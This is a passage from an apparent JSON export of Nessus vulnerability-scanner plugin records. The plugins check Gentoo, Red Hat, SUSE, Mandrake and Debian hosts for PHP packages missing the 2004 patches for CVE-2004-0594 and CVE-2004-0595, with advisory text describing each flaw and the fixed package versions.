(!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-php/php-cgi\", unaffected:make_list(\"ge 4.3.8\"), vulnerable:make_list(\"le 4.3.7-r1\"))) flag++;\nif (qpkg_check(package:\"dev-php/php\", unaffected:make_list(\"ge 4.3.8\"), vulnerable:make_list(\"le 4.3.7-r1\"))) flag++;\nif (qpkg_check(package:\"dev-php/mod_php\", unaffected:make_list(\"ge 4.3.8\"), vulnerable:make_list(\"le 4.3.7-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, 
extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"PHP\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T08:52:33", "bulletinFamily": "scanner", "description": "Updated php packages that fix various security issues are now\navailable.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP server.\n\nStefan Esser discovered a flaw when memory_limit configuration setting\nis enabled in versions of PHP 4 before 4.3.8. If a remote attacker\ncould force the PHP interpreter to allocate more memory than the\nmemory_limit setting before script execution begins, then the attacker\nmay be able to supply the contents of a PHP hash table remotely. This\nhash table could then be used to execute arbitrary code as the\n", "modified": "2019-12-02T00:00:00", "id": "REDHAT-RHSA-2004-395.NASL", "href": "https://www.tenable.com/plugins/nessus/13652", "published": "2004-07-19T00:00:00", "title": "RHEL 2.1 : php (RHSA-2004:395)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2004:395. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(13652);\n script_version (\"1.31\");\n script_cvs_date(\"Date: 2019/10/25 13:36:10\");\n\n script_cve_id(\"CVE-2004-0594\", \"CVE-2004-0595\");\n script_xref(name:\"RHSA\", value:\"2004:395\");\n\n script_name(english:\"RHEL 2.1 : php (RHSA-2004:395)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated php packages that fix various security issues are now\navailable.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP server.\n\nStefan Esser discovered a flaw when memory_limit configuration setting\nis enabled in versions of PHP 4 before 4.3.8. If a remote attacker\ncould force the PHP interpreter to allocate more memory than the\nmemory_limit setting before script execution begins, then the attacker\nmay be able to supply the contents of a PHP hash table remotely. This\nhash table could then be used to execute arbitrary code as the\n'apache' user. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2004-0594 to this issue.\n\nThis issue may be exploitable if using the default PHP configuration\nwith the 'register_globals' setting of 'On'. The Apache memory\nexhaustion bug, fixed in a previous update to Red Hat Enterprise Linux\n3, may also allow this PHP issue to be exploited; this Apache bug does\nnot affect Red Hat Enterprise Linux 2.1.\n\nStefan Esser discovered a flaw in the strip_tags function in versions\nof PHP before 4.3.8. The strip_tags function is commonly used by PHP\nscripts to prevent Cross-Site-Scripting attacks by removing HTML tags\nfrom user-supplied form data. 
By embedding NUL bytes into form data,\nHTML tags can in some cases be passed intact through the strip_tags\nfunction, which may allow a Cross-Site-Scripting attack. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2004-0595 to this issue.\n\nAll users of PHP are advised to upgrade to these updated packages,\nwhich contain backported patches that address these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0594\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0595\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2004:395\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2004:395\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-4.1.2-2.1.8\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-devel-4.1.2-2.1.8\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-imap-4.1.2-2.1.8\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-ldap-4.1.2-2.1.8\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-manual-4.1.2-2.1.8\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-mysql-4.1.2-2.1.8\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-odbc-4.1.2-2.1.8\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-pgsql-4.1.2-2.1.8\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-imap / php-ldap / php-manual / php-mysql / etc\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T09:21:44", "bulletinFamily": "scanner", "description": "The remote host is missing the patch for the advisory SUSE-SA:2004:021 (php4/mod_php4).\n\n\nPHP is a well known, widely-used scripting language often used within\nweb server setups.\nStefan Esser found a problem with the ", "modified": "2019-12-02T00:00:00", "id": "SUSE_SA_2004_021.NASL", "href": "https://www.tenable.com/plugins/nessus/13837", "published": "2004-07-25T00:00:00", "title": "SUSE-SA:2004:021: php4/mod_php4", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2004:021\n#\n\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(13837);\n script_version (\"1.15\");\n script_cve_id(\"CVE-2004-0594\", \"CVE-2004-0595\");\n \n name[\"english\"] = \"SUSE-SA:2004:021: php4/mod_php4\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory SUSE-SA:2004:021 (php4/mod_php4).\n\n\nPHP is a well known, widely-used scripting language often used within\nweb server setups.\nStefan Esser found a problem with the 'memory_limit' handling of PHP which\nallows remote attackers to execute arbitrary code as the user running\nthe PHP interpreter. This problem has been fixed. 
Additionally a\nproblem within the 'strip_tags' function has been found and fixed which\nallowed remote attackers to inject arbitrary tags into certain web\nbrowsers, issuing XSS related attacks.\nSince there is no easy workaround except disabling PHP, we recommend\nan update for users running the PHP interpreter within the apache\nweb server.\n\nTo be sure the update takes effect you have to restart the apache process\nby executing the following command as root:\n\n/usr/sbin/rcapache restart\n\nor if you use the apache2 package\n\n/usr/sbin/rcapache2 restart\n\nPlease download the update package for your distribution and verify its\nintegrity by the methods listed in section 3) of this announcement.\nThen, install the package using the command 'rpm -Fhv file.rpm' to apply\nthe update.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.suse.de/security/2004_21_php4.html\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/25\");\n script_cvs_date(\"Date: 2019/10/25 13:36:27\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the php4/mod_php4 package\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n 
script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( rpm_check( reference:\"mod_php4-4.1.0-317\", release:\"SUSE8.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-core-4.1.0-317\", release:\"SUSE8.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-servlet-4.1.0-317\", release:\"SUSE8.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-4.2.2-479\", release:\"SUSE8.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-core-4.2.2-479\", release:\"SUSE8.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-servlet-4.2.2-479\", release:\"SUSE8.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-4.3.1-169\", release:\"SUSE8.2\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-core-4.3.1-169\", release:\"SUSE8.2\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-4.3.3-177\", release:\"SUSE9.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-core-4.3.3-177\", release:\"SUSE9.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-servlet-4.3.3-177\", release:\"SUSE9.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-4.3.4-43.11\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-servlet-4.3.4-43.11\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-imap-4.3.4-43.11\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-mysql-4.3.4-43.11\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-session-4.3.4-43.11\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( 
reference:\"php4-wddx-4.3.4-43.11\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif (rpm_exists(rpm:\"php4-\", release:\"SUSE8.0\")\n || rpm_exists(rpm:\"php4-\", release:\"SUSE8.1\")\n || rpm_exists(rpm:\"php4-\", release:\"SUSE8.2\")\n || rpm_exists(rpm:\"php4-\", release:\"SUSE9.0\")\n || rpm_exists(rpm:\"php4-\", release:\"SUSE9.1\") )\n{\n set_kb_item(name:\"CVE-2004-0594\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0595\", value:TRUE);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T08:05:25", "bulletinFamily": "scanner", "description": "Stefan Esser discovered a remotely exploitable vulnerability in PHP\nwhere a remote attacker could trigger a memory_limit request\ntermination in places where an interruption is unsafe. This could be\nused to execute arbitrary code.\n\nAs well, Stefan Esser also found a vulnerability in the handling of\nallowed tags within PHP", "modified": "2019-12-02T00:00:00", "id": "MANDRAKE_MDKSA-2004-068.NASL", "href": "https://www.tenable.com/plugins/nessus/14167", "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : php (MDKSA-2004:068)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2004:068. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14167);\n script_version (\"1.21\");\n script_cvs_date(\"Date: 2019/08/02 13:32:47\");\n\n script_cve_id(\"CVE-2004-0594\", \"CVE-2004-0595\");\n script_xref(name:\"MDKSA\", value:\"2004:068\");\n\n script_name(english:\"Mandrake Linux Security Advisory : php (MDKSA-2004:068)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Stefan Esser discovered a remotely exploitable vulnerability in PHP\nwhere a remote attacker could trigger a memory_limit request\ntermination in places where an interruption is unsafe. This could be\nused to execute arbitrary code.\n\nAs well, Stefan Esser also found a vulnerability in the handling of\nallowed tags within PHP's strip_tags() function. 
This could lead to a\nnumber of XSS issues on sites that rely on strip_tags(); however, this\nonly seems to affect the Internet Explorer and Safari browsers.\n\nThe updated packages have been patched to correct the problem and all\nusers are encouraged to upgrade immediately.\"\n );\n # http://security.e-matters.de/advisories/112004.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?83c215d0\"\n );\n # http://security.e-matters.de/advisories/122004.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9d4bce03\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php_common432\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp_common430\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp_common432\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php430-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php432-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:mandrakesoft:mandrake_linux:9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.0\", cpu:\"amd64\", reference:\"lib64php_common432-4.3.4-4.1.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"libphp_common432-4.3.4-4.1.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"php-cgi-4.3.4-4.1.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"php-cli-4.3.4-4.1.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"php432-devel-4.3.4-4.1.100mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"libphp_common430-430-11.2.91mdk\", yank:\"mdk\")) flag++;\nif 
(rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"php-cgi-4.3.1-11.2.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"php-cli-4.3.1-11.2.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"php430-devel-430-11.2.91mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.2\", cpu:\"amd64\", reference:\"lib64php_common432-4.3.3-2.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libphp_common432-4.3.3-2.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"php-cgi-4.3.3-2.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"php-cli-4.3.3-2.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"php432-devel-4.3.3-2.1.92mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:01:07", "bulletinFamily": "scanner", "description": "Two vulnerabilities have been discovered in php4 which also apply to\nthe version of php3 in the stable Debian distribution. 
The Common\nVulnerabilities and Exposures project identifies the following\nproblems :\n\n - CAN-2004-0594\n The memory_limit functionality allows remote attackers\n to execute arbitrary code under certain circumstances.\n\n - CAN-2004-0595\n\n The strip_tags function does not filter null (\\0)\n characters within tag names when restricting input to\n allowed tags, which allows dangerous tags to be\n processed by some web browsers which could lead to\n cross-site scripting (XSS) vulnerabilities.", "modified": "2019-12-02T00:00:00", "id": "DEBIAN_DSA-669.NASL", "href": "https://www.tenable.com/plugins/nessus/16343", "published": "2005-02-10T00:00:00", "title": "Debian DSA-669-1 : php3 - several vulnerabilities", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-669. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(16343);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2019/08/02 13:32:18\");\n\n script_cve_id(\"CVE-2004-0594\", \"CVE-2004-0595\");\n script_xref(name:\"DSA\", value:\"669\");\n\n script_name(english:\"Debian DSA-669-1 : php3 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two vulnerabilities have been discovered in php4 which also apply to\nthe version of php3 in the stable Debian distribution. 
The Common\nVulnerabilities and Exposures project identifies the following\nproblems :\n\n - CAN-2004-0594\n The memory_limit functionality allows remote attackers\n to execute arbitrary code under certain circumstances.\n\n - CAN-2004-0595\n\n The strip_tags function does not filter null (\\0)\n characters within tag names when restricting input to\n allowed tags, which allows dangerous tags to be\n processed by some web browsers which could lead to\n cross-site scripting (XSS) vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2005/dsa-669\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the php3 packages.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 3.0.18-23.1woody2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/10\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security 
Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"php3\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-cgi\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-cgi-gd\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-cgi-imap\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-cgi-ldap\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-cgi-magick\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-cgi-mhash\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-cgi-mysql\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-cgi-snmp\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-cgi-xml\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-dev\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-doc\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-gd\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-imap\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-ldap\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", 
